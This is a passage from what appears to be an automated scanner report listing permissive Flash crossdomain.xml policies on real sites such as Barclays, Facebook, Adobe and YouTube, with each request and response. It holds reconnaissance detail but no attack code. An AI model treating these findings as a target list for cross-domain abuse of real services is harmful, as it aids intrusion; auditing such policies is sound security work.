Date: Mon, 02 May 2011 23:08:19 GMT
Expires: Tue, 01 May 2012 23:08:19 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 51587

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

6.38. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:39:48 GMT
ETag: "20e0a-14a-4a14edca27d00"
Content-Type: application/xml
Date: Tue, 03 May 2011 10:21:50 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

6.39. http://www.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Tue, 03 May 2011 19:20:16 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Tue, 03 May 2011 13:33:53 GMT
Age: 216
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

6.40. http://www.barclays.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barclays.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barclays.co.uk

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:37 GMT
Content-type: text/xml
Last-modified: Fri, 12 Feb 2010 13:25:25 GMT
Content-length: 2371
Etag: "943-4b7556c5"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*.mediaplex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cache.cantos.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtech.panthercustomer.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a1767.g.akamai.net/v/1767/18689/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.a248.e.akamai.net/v/248/18690/7d/img-dc2.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aka-cdn-ns.adtech.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclaysmicrosites.co.uk.lan" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.clabs23.intranet.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="wa6p.wload.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barclays.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.barc1978.121314.co.uk" secure="false"/>
...[SNIP]...

6.41. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.39.47
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.42. http://www.independent.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.independent.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:31 GMT
ETag: W/"238-1296203468000"
Last-Modified: Fri, 28 Jan 2011 08:31:08 GMT
Content-Type: application/xml
Content-Length: 238
Age: 216
Vary: Accept-Encoding,User-Agent
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

6.43. http://www.nbcuniversalstore.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcuniversalstore.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 27 Aug 2010 19:49:19 GMT
ETag: "3f010a-eef-48ed36913edc0"
Content-Type: text/xml
Expires: Tue, 03 May 2011 13:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:53 GMT
Content-Length: 3823
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.abc.com" />
<allow-access-from domain="*.aestaging.com" />
<allow-access-from domain="*.aetn.com" />
<allow-access-from domain="*.aetv.com" />
<allow-access-from domain="*.agentc.com" />
<allow-access-from domain="*.aggregateknowledge.com" />
<allow-access-from domain="*.amazon.com" />
<allow-access-from domain="*.bcsfootball.org" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.bdbshop.com" />
<allow-access-from domain="*.bio.com" />
<allow-access-from domain="*.biography.com" />
<allow-access-from domain="*.blogspot.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsstore.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.cmt.com" />
<allow-access-from domain="*.comedycentral.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.deliveryagent.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.dotomi.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.feedburner.com" />
<allow-access-from domain="*.fox.com" />
<allow-access-from domain="*.foxsports.com" />
<allow-access-from domain="*.friendster.com" />
<allow-access-from domain="*.getfused.com" />
<allow-access-from domain="*.gifts.com" />
<allow-access-from domain="*.go.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.history.com" />
<allow-access-from domain="*.historychannel.com" />
<allow-access-from domain="*.hulu.com" />
<allow-access-from domain="*.hurley.com" />
<allow-access-from domain="*.jackassworld.com" />
<allow-access-from domain="*.marchex.com" />
<allow-access-from domain="*.marthastewart.com" />
<allow-access-from domain="*.marthastewartcrafts.com" />
<allow-access-from domain="*.marthastewartstore.com" />
<allow-access-from domain="*.mslo.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.mtv.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.nbcuniversalstore.com" />
<allow-access-from domain="*.performics.com" />
<allow-access-from domain="*.resultsdemo.com" />
<allow-access-from domain="*.resultspage.com" />
<allow-access-from domain="*.rockbandstore.com" />
<allow-access-from domain="*.seenon.com" />
<allow-access-from domain="*.seenonmtv.com" />
<allow-access-from domain="*.seenonstyle.com" />
<allow-access-from domain="*.shopthefilm.com" />
<allow-access-from domain="*.shopthescene.com" />
<allow-access-from domain="*.sparkart.com" />
<allow-access-from domain="*.tbs.com" />
<allow-access-from domain="*.thesimpsonsshop.com" />
<allow-access-from domain="*.tnt.tv" />
<allow-access-from domain="*.trafficleader.tv" />
<allow-access-from domain="*.tvloop.com" />
<allow-access-from domain="*.ufc.com" />
<allow-access-from domain="*.vh1.com" />
<allow-access-from domain="*.warnerbrosrecords.com" />
<allow-access-from domain="*.watercooler-inc.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.zedo.com" />
...[SNIP]...

6.44. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.45. http://admin7.testandtarget.omniture.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin7.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin7.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 03 May 2011 13:15:18 GMT
Accept-Ranges: bytes
ETag: W/"313-1301702101000"
Connection: close
Last-Modified: Fri, 01 Apr 2011 23:55:01 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.46. http://advertising.microsoft.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 303
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="video.msn.com" />
<allow-access-from domain="images.video.msn.com" />
<allow-access-from domain="fp.advertising.microsoft.com" />
<allow-access-from domain="fporigin.advertising.microsoft.com" />
...[SNIP]...

6.47. http://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Wed, 04 May 2011 02:45:55 GMT
Date: Tue, 03 May 2011 02:45:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 38074

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.48. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
H